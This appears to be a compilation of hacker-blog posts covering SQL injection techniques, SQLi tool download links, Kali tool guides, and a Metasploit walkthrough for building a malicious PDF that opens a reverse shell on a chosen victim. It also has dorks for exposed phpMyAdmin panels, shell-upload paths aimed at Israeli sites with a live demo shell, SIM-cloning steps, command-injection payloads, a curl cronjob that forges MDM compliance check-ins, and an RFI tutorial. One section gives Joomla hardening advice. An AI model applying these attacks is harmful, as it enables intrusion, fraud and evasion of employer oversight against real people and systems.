SQL Injection types

1. Boolean Based Blind SQL Injection
   1. For SQLMap, a Boolean based blind is a technique where in there is a lot of involvement of HTTP request and response reading character by character, comparison and detecting the right output.
   2. Once a vulnerable parameter is detected, SQLMap replaces or appends syntactically valid SQL statements for which we can expect some output.
   3. Say, there is an original un-tampered request with a vulnerable parameter, it has certain response and in next stage there is a request-response from an injected statement, then SQLMap performs comparison between these two responses.
   4. The tool uses bisection algorithm to fetch each character of the response with a maximum of seven HTTP requests and comparing their responses.
   5. Where the output is not within the clear-text plain charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.
2. Time Based Blind SQL Injection
   1. “Time based” itself suggests that there is some comparison on the basis of time the request and response by injecting syntactically valid SQL statement to the vulnerable parameter.
   2. SQLMap uses SQL statements which put the back-end database on hold to return for a certain number of seconds.
   3. Using the same technique i.e. bisection algorithm to inference the output character by character, SQLMap compares various HTTP responses time with the original request.
3. Error-Based SQL Injection
   1. The tool uses SQL statements which would provoke the target database to generate database-specific error.
   2. HTTP response to such request is then parsed by sqlmap in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
   3. This technique works only when the web application has been configured to disclose back-end database management system error messages.
4. UNION Query
   1. A syntactically valid SQL Statement starting with an UNION ALL SELECT is injected to the vulnerable parameter.
   2. UNION query based SQL injection works on the basis of the application behavior i.e. when the application passes the output of written SELECT query through certain loop or line of statements which allow the output to be printed on the page content.
   3. In case the output is not cycled through any “for loop” or other line of statements, SQLMap uses single entry UNION query SQL injection.
5. Stacked Queries
   1. Stacked queries exploitation occurs when an application is supporting stacked queries. SQLMap adds a semi-colon (;) to the vulnerable parameter value and appends SQL statement which is to be executed.
   2. Using this technique it is possible to run SQL statements other thank SELECT. This is useful for data manipulation, to get system read-write access and finally own the operating system.
6. Out-of-band
   1. This technique uses a secondary or different communication channel to dump the output of the queries fired on the vulnerable application.
   2. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain.

Read More

Top 10 Sql Injection tools

10 Powerful SQL Injection Tools That Penetration Testers Can Use
1. BSQL Hacker
This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.

Download: http://flexydrive.com/q75te2c2banl
2. The Mole
This is an SQL Injection tool that uses the union technique or the boolean query-based technique.
Download: http://flexydrive.com/3pr6tjhb0b8p
3. Pangolin
This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.
Download: http://flexydrive.com/i6sq1d5i6ysd
4. Sqlmap
This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.
Download: http://flexydrive.com/yrc3szqgr9i0
5. Havij
This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.
Download: http://flexydrive.com/t2j5ymthhlss
6. Enema SQLi
This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.
Download: http://flexydrive.com/qyxp8tk2m85z
7. Sqlninja
This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.
Download: http://flexydrive.com/2wp50o3ojbii
8. sqlsus
Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.
Download: http://flexydrive.com/tyn0mmznl7e5
9. Safe3 SQL Injector
This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.
Download: http://flexydrive.com/6rl4s64fug7i
10. SQL Poizon
This tool includes php , asp , rfi , lf dorks that can be used for penetration testing.
Download: http://flexydrive.com/o29h5b7p5221

Read More

How to add Workspace In Metasploit kali linux

Jai Hind I am DeadManINDIA from (IHT) 1ND14N H4X0R5 T34M

We are :- EagleShadow,Null_Port_Govind,Mr.R@66!T,Haxor-Rahul,Spy-Hunter,Grey-Noob,Karate-Katrina.

Love to :- My Mom And My Dad.

Today we will discuss on the how to add the workspace in metasploit in kali linux .
lets go 


Setup 1 :- first of all start the database and metasploit services with the help of these commands.
 1st :- service postgresql start
2nd :- service metasploit start

Setup2 :- Now run the metasoploit with the command .
syntax:- msfconsole

Setup 3 :- Now we are use the this command here to add the workspace in metasploit.
syntax:- workspace -a <worksapce name >

in this - a for add the workspace and <workspace name is the name of work sapce .

  in my case i add IHT workspace here .

Now most important thing we are using the - h option to see the help.
like this 

#workspace -h  


Thanks for reading
          Jai Hind Jai Bharat 
 

Read More

#‎HOW_TO_CHANGE_NAME_OF_A_FACEBOOK_FANPAGE_AFTER_200_LIKES‬:

As we know we can't change page name just after 200 likes. Means you are only able to change page name just before completing 200 likes on page and then after the option will be disappears and page name got fixed. In that condition suppose your page have 10,000+ or 200+ likes but you decide to change your business name then its a great problem because their is not possible way to shift.
►Steps For Changing Page Name:

1.Open Google Chorme Browser
2.goto Settings
3. Show Advance Setting
4.Change Proxy Set IP
5.212.138.92.17 port 8080
6.Restart Your Browser
7.Open Page
8. Update Page Info
9. Translated Name
10.Right Click on Arabic and Inspect Element
11.Change Arabic to
<tr class="_1hoi dataRow"><th
class="label">English:</th><td
class="data"><input type="text"
class="inputtext" name="en_XX"></
td></tr>
12.Now English will appear in place of Arabic, write new name and press save.
13.Name Changed Thats All

Read More

101 Top Tools For System And Network Admins!

101 Top Tools For System And Network Admins!

Are you a system administrator? If yes, then these tools will come in handy for you!    Rate this news:  (3 Votes) Monday, March 24, 2014:  System and network admins need a variety of tools to work with. These tools are available in numbers, which makes it hard to sort out the best from the rest. Here's help! System and Network Analysis: As an administrator, it is your job to monitor the system and network that you are presiding over. Analysis is an important part of being in the know of what's happening and when a particular action is required. That is where system and network analysis tools come in handy. 1. NTFS Permissions Explorer 2. Xirrus Wi-Fi Inspector 3. Whois 4. ShareEnum 5. PipeList 6. TcpView 7. The Dude 8. Microsoft Baseline Security Analyzer 9. WireShark 10. Look@LAN 11. RogueScanner 12. Capsa Free Network Analyzer 13. SuperScan 14. Blast 15. UDPFlood 16. IPplan 17. NetStumbler 18. PingPlotter 19. SolarWinds Free Permissions Analyzer for AD 20. Angry IP Scanner 21. FreePortMonitor 22. WirelessNetView 23. BluetoothView 24. Vision 25. Attacker 26. Total Network Monitor 27. IIS Logfile Analyser 28. ntop System testing and troubleshooting: What's the next logical step after analysis your network? Of course, testing whether your analysis was right or wrong. To put it more clearly, as a system or network admin, it is one of your jobs to perform tests on your domain. These are the tools that let you do that. 29. Pinkie 30. VMWare Player 31. Oracle VirtualBox 32. ADInsight 33. Process Monitor 34. SpiceWorks Network Troubleshooting 35. RAMMap 36. Autoruns 37. LogFusion 38. Microsoft Log Parser 39. AppCrashView 40. RootKitRevealer System and network management: These are tools that allow you to manage the network or system. In a way, they comprise of various tools that help an IT professional to manage a bunch of tasks or certain specific tasks. 41. Bitcricket IP Subnet Calculator 42. EMCO Remote Installer Starter 43. ManagePC 44. Pandora FMS 45. SNARE Audit and EventLog Management 46. OCS Inventory 47. Zenoss Core – Enterprise IT Monitoring 48. Unipress Free Help Desk 49. SysAidIT Free Help Desk 50. Cyberx Password Generator Pro System and Network Management: These are tools that allow you to manage the network or system. In a way, they comprise of various tools that help an IT professional to manage a bunch of tasks or certain specific tasks. 51. KeePass Password Safe 52. TweakUAC 53. Microsoft Application Compatibility Toolkit 54. ExtraSpy Employee Monitor 55. NetWrix USB Blocker Freeware 56. FileZilla 57. Wake On Lan 2 .NET 58. Speccy 59. Active Directory Explorer (ADExplorer) 60. ADRestore File and disk management: These are tools that allow you to perform various operations on your files. These include operations like de-duplication, copying, file comparison, merging, encryption, syncing, searching and renaming of files. These files can be invaluable additions to your arsenal as a system administrator. 61. Disk2vhd 62. Defraggler 63. PageDefrag 64. PsPad 65. MD5Summer 66. Universal Viewer 67. FreeCommander 68. Recuva 69. Steganos LockNote 70. Microsoft SyncToy 71. 7-Zip 72. PeaZip 73. Bacula 74. Areca Backup 75. DirSync Pro 76. Amanda Network Backup 77. WebSynchronizer 78. KGB Archiver 79. Iometer 80. Notepad++ Performance and availability monitoring: These tools allow you to monitor your system and network performance and monitor them for possible errors etc. They provide functions such as monitoring of memory utilisation, network utilisation, disk utilisation, CPU utilisation etc. In addition, you can also use the network monitoring tools in order to ensure that your network is performing at its optimal levels and is stable. 81. ManageEngine Free HyperV Performance Monitor 82. Nagios 83. ManageEngine Free Exchange Health Monitor 84. Kratos Exchange Monitor 85. ManageEngine Free Windows Health Monitor 86. ManageEngine Free Ping Tool 87. ManageEngine Free SQL Health Monitor Tool 88. ManageEngine Free VM Configuration Tool 89. Kratos Network Device Monitor 90. IxChariot QCheck 91. EasyNetMonitor Remote management: As a system or network admin, you will be dealing with a lot of remote connections and clients. In order to manage this task efficiently, you need tools like the ones mentioned below. You can use them to remotely administer clients and servers, manage remote desktop sessions and various other functions. 92. Remote Desktop Manager 93. TightVNC 94. Microsoft RDCMan 95. Terminals 96. PsFile All-in-one toolkits: Sometimes you do not want to use different tools for different purposes. You want tools that can manage multiple functionalities by themselves so that you don't have to switch over to a new one whenever your attention is needed in a new direction. These are all-in-one kits that fill up some of the gaps that exist in this respect. 97. Net Tools 5.0 98. ManageEngine Free Windows Tools 2 99. Axence NetTools Pro 100. Free IP Tools 101. PsTools

Read More

How to use Plecost Tool for scanning wordpress sites

Jai Hind friends I am DeadManINDIA From IHT(1ND14N H4X0R5 T34M).

We are :- Null_Port_Govind,Haxor-Rahul,EagleShadow,Spy-Hunter,Grey-Noob,
                Mr.R@66!T,Karate-Katrina.
Love to :- My Mother,My Father .

Today i m going to explain how to scan wordpress website with the help of Plecost in kali linux.

Steups :-
1  Change the directory like this and come in to the plecost directory
     /usr/share/plecost/
Syntax  :- cd /usr/share/plecost/

2 Now check the content of the directory here you find a wp-plugins-list.txt

 this the list of plugins of wordpress.

3 Final steup we are run this command for start scan 
Syntax:-   plecost -i wp_plugin_list.txt <url of site >

We are try to some differnt options in this tool so please read the manual and try those tools and enjoy.

Thanks for reading give your feedback on Facebook or Skype
FB =====>>>> DeadManINDIA
Skype======>DeadManINDIA1
                                                  Jai Hind Jai Bharat

Read More

How to Use BlindElephant tool in kali linux

Jai Hind Friends I am DeadManINDIA as u know today i m going to explain how we use the BlindElephan.py tool in kali linux.

Greetz To :- Null_Port_Govind,EagleShadow,Haxor Rahul,Mr.R@66!T,Grey-Noob,Spy-Hunter,Karate-Katrina,IndiWar,X-MAN-INDIA,Satish Choudhary ,Mahi Di.

Love to ----->>>>My Mother And My Father.

So lets Start :- 
 1 Open Terminal and type BlindElephant.py Like this

2  Read The Options carefully and then take next steup.
3 Then use this command
Syntax:- BlindElephant.py <site url> <type of site >
In this we are type or paste the url of site on the place of <site url>and
type of site like wordpress ,joomla, or other what kind of site you are going to scan.
see in my case i use like this

And in the last you find your result.

Thanks for reading give your feedback on Facebook Or Skype
FB = DeadManINDIA
Skype= DeadmanINDIA1
                                               Jai Hind 
                                             Jai Bharat

Read More

How to add plugin in OllyDbugger kali linux

Hell Friend I m DeadManINDIA From 1ND14N H4X0R5 T34M (IHT)
                                       JAI HIND
                               JAI BHARAT
 

Love to :- My Father,My Mother, Eagleshadow,Mr.R@66!T,Null_Port-Goving,Grey-Noob,Karate-Katrina,Spy-Hunter,Haxor-Rahul.

Lets Start :- 

What I am Doing ?
I am here explain how to add Hide Debugger 1.2.4 in OllyDbg in kali linux.

Steups :-
1 First of all download the Hide Debugger from here

2 Now uncompress the file with the help of command.
    Syntax:- unrar x Hide Debugger v1.2.4.rar

  3 In my case I uncompress the rar file on my desktop now we open the directory.And copy these files which i show in imp

4 Now we are paste these files in the ollyDbugger directory
   Open /usr/share/ollydbg/

And paste here all files which you copy.

Now start the ollydbg then you find the hide-dbugger pulgin in pulgins.


JAI HIND FRIENDS I HOPE YOU ENJOY TUT IF ANY PROBLEM THEN TELL ME ON FB OR SKYPE
FB = DeadManINDIA
Skype = deadmanindia1

Read More

Adobe PDF Embedded EXE Social Engineering exploit

Adobe PDF Embedded EXE Social Engineering exploit

 

Lets Begin :1) Prepare a .pdf file that you wish to embed within the malicious file. This file will greet the target when he executes the malicious file. So pick something related to the theme of his job, for example if he is a doctor then send him some medical bullshit .pdf you find on the net.

2) Load up msfconsole and type : search pdf embed


3) You know the drill, for more information on the exploit type : info exploit/windows/....../....../....../

4) Read through the description section

5) Type : use exploit/windows/fileformat/..../...../

6) Its time to pick a desirable payload for your scenario, type show payloads

7) I have chosen the common windows/meterpreter/reverse_tcp

8) Once you have made your payload choice, lets prepare with setting up the exploit.

a) set PAYLOAD (choice of payload)
b) set LHOST (your IP)
c) set LPORT 4444 (by default)
d) set FILENAME ( give your malicious .pdf a name)
e) set INFILENAME (provide the .PDF you prepared to embed, refer to point

9) And finally type, exploit.

10) As shown in the example below, the new malicious file has been created and is stored in my root/.msf4/local folder

11) So when the victim executes urgent.pdf, he will be greeted with the .pdf file we declared during our set INFILENAME options. But behind the scene, our payload gets executed.

12) There we go, satan is sitting right there.413) All that is left for us to do now is to set up our multi handler.

13) As shown in the image below.a) set PAYLOAD (Must must use the same payload as the one you used on your victim)b) set LHOST (Your ip)c) set PORT 4444 ( By Default)

Read More

PhpmyAdmin Exploit with Google Dorks

Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema

2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Read More

Secure Joomla sites

ecurity of Joomla Website by Htaccess
Htaccess is a configuration file from web servers that run Apache as their server software. It is a very powerful configuration file which can control the server. Htaccess is a hidden file which should be already present in the root directory of your server. If it’s not, then you can create it, but make sure that the right name of the file is “.htaccess” (yes, it starts with a dot). Since we can do so many things with the help of .htaccess, in this section I will discuss the security aspect of an .htaccess file for Joomla.
You can protect the administrative area using different techniques. For example, you can restrict it based on the IP address (in this case you’d need to create an .htaccess file on the administrator directory):

order deny,allow
allow from 116.71.18.189
deny from all

Remember, if your ISP is using the dynamic IP technique, then it is not a good idea to use this technique since your IP address might change at any given time. To prevent use of the directory listing (because an attacker may read important files off the server and a directory listening always help a hacker learn about the security practices of a website), you can write the code below into the .htaccess file which is present in your root:

IndexIgnore *
Options -Indexes

Another best practice is to disable the server signature because it gives an idea about the web server software and the version of the software. To do this, add this line in the .htaccess file to disable the server signature:

ServerSignature Off

Another important step is to secure the .htaccess file itself so that nobody can read it on the browser. To do this, you need to add these lines on the .htaccess file:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Configuration.php is a very important file because it contains information about the database of the website and other relevant information. So you need to secure the configuration.php file by utilizing the .htaccess file:

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

Since there are various security risks associated with the configuration.php file, it is not enough to simply make the adjustments above. For maximum security, you need to move configuration.php outside the public_html. But how to do this? If you simply move the configuration.php file then your website might crash.
How to Move the Configuration.php Outside the public_html Joomla
Below is a tutorial that has been tested on Joomla 1.5 to move the configuration.php file outside the public_html.
In the first step, you need to create a directory home (outside the public_html). Suppose the directory name is irfan:







Download and make a backup of configuration.php.
Delete the current configuration.php from the Joomla folder (from public_html). Remember, when you delete it your website might crash and the error will read:






Go on the folder that has been created in the first step.
Upload the configuration.php in that file.
Go the Joomla file (includes/defines.php) and replace the line:  

define(‘JPATH_CONFIGURATION’,JPATH_ROOT); with: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../rootfoldername’);. If 

Joomla is in subdirectory, then replace it with: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../../’.DS.’rootfoldername’); (it is a case sensitive so be sure to use proper caps).
 

Remember, the rootfoldername is the name of the folder that we have created in the first step (which is irfan in this case study).
Repeat the same step for: administrator/includes/defines.php.
Now the website is ready and secure.

Conclusion
Since the Internet is not a very safe place, you need to take a personal interest in the security of your website. So if you’re using the Joomla platform, be sure to implement the best security practices available, if you want to remain secure.

Read More

HEART BLEED TOOLS (OPEN SSL)

HEART BLEED TOOLS (OPEN SSL)

CHECKER:

https://github.com/FiloSottile/Heartbleed

ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford

http://pastebin.com/WmxzjkXJ

SSL Server Test :

https://www.ssllabs.com/ssltest/index.html

Metasploit Module: 

https://github.com/rapid7/metasploit-framework/pull/3206/files

Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: 

https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse

Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas 

https://gist.github.com/RealRancor/10140249

Heartbleeder: Tests your servers for OpenSSL:

https://github.com/titanous/heartbleeder?files=1

Heartbleed Attack POC and Mass Scanner:

https://bitbucket.org/fb1h2s/cve-2014-0160

Heartbleed Honeypot Script: 

http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Read More

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp

# DEMO SHELL -|- 
http://littlebags.co.il/banners/1dea62aa_bddf_4e3d_8464_f640f62ac8c7.asp

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

Read More

Sim-Cloning tut

1. Buy a Sim card Reader
2.Need a Blank sim card or super sim card
3.Download Magicsim at http://www.magicsim.com/en/multi-sim.asp? new_id=6
4. Download http://www.filecart.com/Windows/System-Utilities/Backup-Restore/USB-SIM-Card-Reader- Software_1711_1.html
5. Install programs.
6. go in phone tools, select sim card, then select unlock sim, it will promt for a code.
7 call network provider, they will ask for your phone number, your account info, name and security code,
then they will ask why you want to unlock your simcard, just tell them you need to unlock your sim to get it
to work with your overseas phone or something.
8. Once they give you the sim unlock code, enter it, and it will say sim unlocked.
9. remove the sim from your phone, place it in the cardreader, click read from card in magic sim program.
10. once it says connected, select crack sim in the toolbar. click strong ki and clink all of the other find options and then click start.
11. Once your ki is found and the crack is finished, click file, save as and save your cracked sim info to a that file.
12. IMPORTANT!!! you must click disconnect from the file menu or you will ruin your simcard. once it says
disconnected, remove the sim. put it in your phone and see if it still works, it should. if not, you either did not unlock your sim, or you tried to copy it instead of crack and save.
13. insert black 3g card Use other program, not magic sim at this point.
14. click connect
15. it will say no info found if it is truly blank.
16. select write to sim, it will promt you to select a dat file, select the one you saved before, now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code network provider gave you, then click finish.
17. your card is cloned. if you try to make 2 calls at the same time, one will go through, the other will say call failed, and both phones will get the same messages, text and voice, and both will recieve the same calls, but only one can talk at a time.

Read More

Remote Code Execution (RCE)

Remote Code Execution (RCE)
I'm going to demonstrate you the Remote Code Execution vulnerability.

The main reason of this vulnerability is taking the un-filtered user input as a part of the command that will be executed.
Injection vulnerabilities (SQL, XPath, LDAP etc.) can be classified as RCE Vulnerabilities.

For example our source code will be like this;

PHP Code:

<?php <html>
<a href="?cmd=echo %TIME%">View Time</a><br>
<? if(isset($_GET['cmd'])) print "<b>Current Time: </b> " . shell_exec($_GET['cmd']); ?></html> 

As you can see, our page is executing a MS-DOS command to view the current time.
Note: This is not necessary actually. We can simply use the date() function of Php to view the current time.

Back to our subject. There is a parameter named "cmd" that takes its value via GET method. As you can guess, we can manipulate that parameter and execute any MS-DOS command we like.

Image has been scaled down 16% (676x202). Click this bar to view original image (799x238). Click image to open in new window.

We just gathered information about BIOS. Imagine how many you can do with this vulnerability if the user had full access.

(07-05-2013 02:32 AM)The Alchemist Wrote:  Another form of this vulnerability can be :

Code:

<form action="add.php" method="post">
<textarea rows="20" cols="30" name="text"></textarea>
<input type="submit" value="Submit" name="sub"/>
</form>

add.php :

PHP Code:

<?phpif(!empty($_POST['text']))
{
    $hand = fopen("some.php","a");
    fwrite($hand,$_POST['text']);
    fclose($hand);
}?>

And when someone executes some.php.....

Another example:

Code:

<form action="#" method="POST">
<b>Enter your name:</b><br>
<input type="text" name="name"><br>
<input type="submit" value="Send"><br>
<br>
</form>
<?php
if(!empty($_POST['name'])){
$filename = "some.shtml";
$file = fopen($filename, 'w') or die ("File couldn't opened!");
$text = "Hello ".$_POST['name']."!";
fwrite($file, $text);
fclose($file);
print '<a href="some.shtml">Click Here To Go!</a>';
}
?>

If you put in name field a SSI command, It'll be saved to some.shtml and will be executed when you open it.

More example;

(07-05-2013 08:54 PM)shp0ngl3 Wrote:  This is a nifty little vuln with possible severe outcome if in wrong hands. I've seen several ping services that's vulnerable to this.

I've seen code similar to this

Code:

<?php
$target = $_POST['target'];
exec("ping {$target}", $output);
foreach ($output as $line) {
    echo "{$line}<br />\n";
}

So, executing commands is as easy as in your own terminal

Code:

-c 0 google.com;ls -la /

or

Code:

-c 1 google.com && ls -la /

This is the logic of Remote Code Execution. To avoid this vulnerability, dont use the user input in your commands that will be execute. If you have to use, check and filter them properly.

I hope you'll like this tutorial

Read More

Bypassing AirWatch Root Restriction

Mobile devices are becoming more common in corporate environments. As a result, mobile device management solutions (MDM) have cropped up so that employers can remotely manage and wipe devices if necessary along with setting certain requirements that employees must comply with, such as setting a passcode, encrypting the device, and not jailbreaking or rooting the device. It’s certainly not a bad idea to enforce restrictions on devices that may contain sensitive information. However, bypassing some of the restrictions that an employer may put in place it not difficult. This is especially true if someone wants to keep their device rooted.  There are many contenders in the sphere of MDM software. For this blog I will be looking at AirWatch for Android. The device I will be using is a rooted Nexus 4 running Android 4.2.2.
[Note Update at End of Post - 09.13.13]

Background

AirWatch is an MDM solution that provides employers with the ability to manage mobile devices and enforce policies. An agent is installed on the device and monitors whether the device is compliant or not for specific policies. If a device is found to be non-compliant, the agent phones home to a server, notifying the employer of a non-compliant device.

Here is the default web interface for an AirWatch enrolled device. As you can see, my Nexus 4 is enrolled, is encrypted, and requires a passcode. However, it is still not compliant because my device has been “compromised,” i.e. rooted by myself. A poor word choice in my opinion. The same can be seen on the AirWatch agent.


If we navigate to the compliance section, we can see why we are not compliant.

Again, the agent shows that we are encrypted, but our device is “compromised.”

Digging Deeper

At this point I want to know how AirWatch is detecting that my phone is rooted. I tried removing the su binary and any superuser applications, but that didn’t seem to work. As a rooted phone, we can certainly grab the apk of the agent and tear it apart. That only revealed obfuscated java classes that would take a while to decipher. Next, I tried running strace against the agent process to get an idea of the calls that it is making, hoping that there would be something there that reveals what it is doing to detect root. Again, there weren’t any answers that I could find.

I decided to shelve looking for how AirWatch was detecting root for another day and instead I started focusing on the HTTP request and responses that the agent was sending and receiving. I started burp and setup a proxy on my Nexus 4. There is a fair amount of traffic that goes between the AirWatch agent and the server it’s talking to. One request in particular caught my eye.

This AirWatchBeacon checkin request. I omitted some of the more sensitive information in the request. As you can see there is an “IsCompromised” field in the request that is set as true. So I change that to false and sent the request off. After refreshing the web interface, my device is no longer compromised.

The agent also shows that my device is no longer compromised.

So now we know how the agent is checking into the server and whether or not your device is compromised. By changing a simple flag, we now control that. Furthermore, there doesn't seem to be any type of session information related with the request. We can replay the same request hours, even days later, and the server will accept it. The only downside now is that the agent will periodically do a check-in request with the server and report that the device is compromised. It’s a hassle to send a non-compromised request every time we want to be compliant. The first step I took in resolving this issue was to look at the AirWatch configuration options in its SQLite database.

Using the SQLite Editor app from the Android market, I open up the AirWatch database with root access.

Selecting the AirWatch database reveals a number of interesting tables.

The profileGroupSetting table is where most of the AirWatch configurations are stored.

There are a few rows that look interesting. The ones that contain interval in the name seem to set how often the AirWatch requests are sent. I tried changing the BeaconInterval to large values to see if it would take longer for the check in requests to be sent. That didn't seem to work. Neither did setting the value to zero or a negative value. For the most part, setting the interval values do not seem to do anything in my testing.

There is, however, another way to stop AirWatch from sending out request. Modifying the Android hosts file to block the host that the requests are being sent to. The Android hosts file is located in /system/etc/. Again, you have to be root to be able to modify the hosts file. I modified the hosts file to redirect the requested host to my localhost. The requested host is going to be different for every company, so I won’t be showing that. It’s been well over a week and my device has still not checked in and still shows that I’m compliant.

The only downside to not checking in often is that your device will show as not being seen for sometime. You employer may have a policy in place to remove devices that AirWatch shows as being inactive. One way to mitigate this is to periodically send out the checkin request yourself. Simply setting up a cronjob with curl to send out the checkin request work very well.

#!/bin/bash

 

curl -X POST -d @request https://host/DeviceServices/AirWatchBeacon.svc/checkin -H "Content-Type: application/json" -H "User-Agent: AirWatch Agent/4.0.401/Android/4.2.2" -H "Host: host"

Here is the json POST request data the curl command uses for –d @request:

{"payLoad":{"FriendlyName":"Android_sdNexus 4_353918050698915","Model":"Nexus 4","CustomerLocationGroupRef":"YourGroup","PhoneNumber":"1111111111","DeviceType":5,"C2dmToken":"APA91bHcoJnegJy23fPaa2Fg2miP0vJEuC9aVcAw9iuwKb8AQcnzr7OyiXShrJSGD_AajBPUwuSm4Y_gcuz3ibnnjfbfpkLnAnoF599IM2yZhTVaUq0XWLKFfNP11oYzIavq4OjTO5DH4y3XpkvWmQBD16qkFJEg1BFFuOA2y1SJo6aE2yILIIo","IsCompromised":"false","OsVersion":"4.2.2","SerialNumber":"1111111111","Name":"Google occam","MacAddress":"ff:ff:ff:ff:ff:ff","DeviceIdentifier":"11111111111111","AWVersion":"4.0.401","TransactionIdentifier":"a8098ea5-a54e-412f-a911-a58920a24dc7"}}

Finally add the bash script to your crontab by running “crontab –e” to edit the crontab and add the following at the end of the file:

0 */2 * * * /root/command.sh

This will cause the script to run every two hours.  Conclusion
MDM solutions are great for employers to manage mobile devices. However, they are not without their problems. Not only was I able to bypass compliance for having a rooted device, but I was also able to bypass the need to encrypt my device from the profileGroupSetting table. Bypassing compliance restrictions for AirWatch is relatively trivial after a few hours and I’m sure it is probably similar with many others MDM solutions.

Read More

RFI Full Tutorial For All New N00bs

Intro: What is RFI??

1.Understanding RFI

2.Finding RFI vulnerabilities

3.Exploiting RFI vulnerabilities

4.Securing RFI vulnerabilities

RFI means Remote file inclusion. 

RFI is a type of web application security hole.

On the net, there are so many sites which are vulnerable to RFI.

In this tutorial, I am going to show you RFI with PHP. 

PHP is a web script engine. Its the most widely used one so that's why I am using it in this tutorial.

Learn more about PHP: http://php.net

http://en.wikipedia.org/wiki/PHP

To understand what file inclusion is I am going to show a little example.

This is an example site in PHP:

PHP Code:<?php   $content = “Hello and welcome to the site”;?><html><head><title>Hello world</title></head><body>
<?php echo($content); ?>
</body></html>

This is a very basic page. But as your page expands you might

want to put the individual pages in their own files and include them in

the main file depending on user input.

This way, when you got pages with perhaps 10k lines of PHP code you don't have to use hours looking

for the bit of code you want to edit/view.

By user input I mean things like a URL GET argument. A GET argument could look like this:

HTML 

www.site.com/index.php?page=index

In the above example the PHP script would see the “page=index” and then show the content of “index”. The “index” can be anything, can be a file, SQL value, hard-coded variable. If it is a file, then the PHP script is most likely using the include() function and that is file inclusion.

1.Understanding RFI

So, in the above text I said that file inclusion is including files in another file. Well, that is all right but what does that actually mean?

Well, lets say we got 2 files.
index.php
content.php

The index.php is the file people is going to view when they visit my page. www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.

All you would need to do is put this PHP script in the index.php:
 

 (php)

PHP Code: <?php include(&#8220;content.php”); ?>

Now we are showing the contents of content.php when the user visits index.php. If content.php was to include more PHP code it would also get executed.

That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.


Lets create a new scenario. A more realistic scenario. We got the following files/pages:

index.php
1.php
2.php
3.php

Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links.

www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php.

The index.php script site would in this case look something like this(note that I am now coding like an idiot to create security holes):

Code: (php)

PHP Code: if (isset($_GET['page'])) {
   include($_GET['page'] . &#8220;.php”); } else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>'); } 

The content of 1,2 and 3 is not important in this example so I wont say anything about that.

Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + “.php” the same goes for 2 and 3.


Now, what is this “Remote” part in RFI all about? Well, this belongs more in the “exploting RFI vulnerabilities” part of this tutorial but I have to say something short about it now.

The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4

That would give us an error(assuming the server administrator have not turned off “show errors” in the PHP configuration). The error would look something like this:

Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3

